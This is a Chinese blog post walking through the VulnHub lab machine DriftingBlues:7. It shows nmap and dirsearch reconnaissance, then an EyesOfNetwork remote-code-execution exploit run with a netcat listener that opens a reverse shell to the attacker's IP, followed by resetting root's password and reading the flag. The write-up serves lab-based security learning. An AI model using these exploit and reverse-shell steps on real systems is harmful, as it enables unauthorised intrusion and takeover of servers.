vulnhub靶机 | DriftingBlues:7

最新推荐文章于 2024-04-29 18:30:00 发布
最新推荐文章于 2024-04-29 18:30:00 发布
阅读量1.1k 收藏 5
点赞数 6
分类专栏: # vulnhub 实战 # 实验:靶机、CTF等 文章标签: 安全漏洞 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44519789/article/details/117665943
版权

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:

  • vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路
  • 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。

在这里插入图片描述

创建时间:2021年6月7日
软件: MindMaster Pro、kali、DriftingBlues:7靶机

DriftingBlues:7靶机解题过程及思路

前言:

在这里插入图片描述

  • 题目的目标是要夺到里面的flag

信息搜集:

  • 在信息收集阶段,我们需要尽量多的收集关于目标web应用的各种信息,
  • 比如:脚本语言的类型、服务器的类型、目录的结构、使用的开源软件、数据库类型、所有链接页面,用到的框架等。
  • 第一步:扫描当前网段中的存活主机发现目标主机
  • 指令模板:nmap -sP IP地址
nmap -sP 192.168.224.1/24

-

  • 第二步:查看端口及上面运行的服务查看端口及服务
  • 指令模板:nmap -p- IP地址
nmap -p- 192.168.224.135

在这里插入图片描述

  • 第三步:查看端口上面运行的服务版本查看端口上运行服务版本
  • 指令模板:nmap -sV IP地址
nmap -sV  192.168.224.135

在这里插入图片描述

  • 补充:常见端口及服务
  • 22端口:SSH服务端口,可能存在 弱口令暴利破解
  • 80端口:HTTP端口,有可能对应网站接口
  • 443端口:HTTPS端口
  • 3306端口:MySQL数据库端口,可能存在 弱口令暴利破解

漏洞发现以及漏洞利用:

  • 我们可以尝试访问一下66、80、443端口看看
  • 首先访问一下:66端口 ,因为是上面运行了SimpleHttpServer

在这里插入图片描述

python3 dirsearch.py -u http://192.168.224.135:66/

在这里插入图片描述

  • 扫描出一个index_files文件夹,尝试进行访问

在这里插入图片描述

  • 但是里面并没有发现什么有价值的东西,然后就卡住了。
  • 换条路
    在这里插入图片描述
  • 访问80端口:发现里面有一个登录窗口??? 哇哦~

在这里插入图片描述

git clone https://github.com/h4knet/eonrce.git

在这里插入图片描述

  • 需要先赋予运行权限
chmod +x eonrce.py

在这里插入图片描述

  • 在Kali 开启监听
  • 指令模板:nc -lvp 指定端口

在这里插入图片描述

  • 运行脚本:./eonrce.py https://192.168.224.135 -ip 192.168.224.129 -port 8888
  • 指令模板:./eonrce.py 连接URL -ip 指定本机IP -port 指定nc监听的端口

在这里插入图片描述

  • 我们修改root的密码passwd root
  • 由之前扫描发现开了ssh服务,我们用 ssh 连接靶机ssh 192.168.224.135

在这里插入图片描述

  • 查看root用户目录下的文件
  • 发现有个叫做flag.txt的文件,查看一下

在这里插入图片描述
在这里插入图片描述

  • 443端口就直接出个这???

在这里插入图片描述

  • 大体意思就是个这???

在这里插入图片描述

  • 这个是没啥用…

各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
在这里插入图片描述

博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!

在下小黄
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 10
    评论
专栏目录
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8272
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 908
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
VulnHubDRIFTINGBLUES: 7
weixin_42075643的博客
04-28 796
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 684
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
Vulnhub:DRIFTINGBLUES: 7
NeverForgetCX的博客
02-28 3219
前言: 在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战 靶机Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!! 信息收集: 攻击机kali:192.168.2.87 靶机ip:192.168.2.90 打开靶机竟然直接看见了ip信息 IP:192.168.2.90 直接登入kali使用nmap端口扫描 nmap -sV 192.168...
DriftingBlues-7靶机进行渗透测试
zll___的博客
04-20 634
DriftingBlues-7靶机进行渗透测试
vulnhub--driftingblues:2
venu_s的博客
06-03 409
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
vulnhub--DriftingBlues:6复现超详细过程
m0_54024658的博客
06-05 389
下载靶机并且导入VMware masscan扫描存活主机,发现目标靶机192.168.152.225,并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口,查看原代码,没有什么发现,想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP,发现了一个文件robots.txt,访问一下。 访问robots.txt文件发现一个目录,和提示目录
vulnhub靶机 | DriftingBlues:6 write-up
xj28555的博客
05-06 777
nmap -sP 192.168.110.1/24 #首先扫描存活网段 扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口,进行访问。 发现只有一张图片,那我们只好开始CTF的套路了,扫描目录。 python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录 扫到robots.txt文件,进行访问一下。 有...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1417
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
Vulnhub靶机driftingblues 7
qq_48904485的博客
01-19 414
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
靶机driftingblues7_vh
weixin_50339323的博客
08-03 337
一、信息收集 1、靶机ip 扫描存活靶机: nmap -sP 192.168.8.0/24 2、靶机端口 namp -sC -sV 192.168.8.131 显示开放的端口有:22 、80、111、443、3306、8086 3、网站信息收集 访问192.168.8.131 一个登录页面 查看源码,源码内有很多链接,逐一查看,一个网页内有Eyes ofNetwork 的相关信息,包括版本 搜索EyesOfNetwork相关信息,是一个构架管理,...
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 668
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
driftingblues7_vh】靶场记录
weixin_46411728的博客
02-20 153
driftingblues7_vh】靶场记录
DRIFTINGBLUES: 7靶机
小小猪的博客
06-23 198
DRIFTINGBLUES: 7靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.247
vulnhubdriftingblues7_vh
鲨鱼辣椒的博客
06-09 616
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
whyrookie的博客
04-15 7920
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Sh...
vulnhub靶场之driftingblues-7,9
最新发布
qq_58091216的博客
04-29 171
我们在/home/目录下发现了clapton文件夹,里面有user.txt,我们进行查看,发现了第一个flag。我们查看源代码,发现版本号是ApPHP MicroBlog v.1.0.1,我们可以进行搜索漏洞。我们访问80端口可以看到是一个登录页面,可能是爆破用户名和密码,其他端口都没有有用的信息。我们可以看到反弹成功,我们切换用户clapton/yaraklitepe。我们还看到了一个note.txt文件,我们进行查看,发现是一个提示。开启的端口有点多,首先我们一个一个进行渗透测试,我们先渗透靶场7。
【靶场系列】driftingblues7
qq_41169485的博客
04-23 343
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

在下小黄

ღ给个赞 是对小黄最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值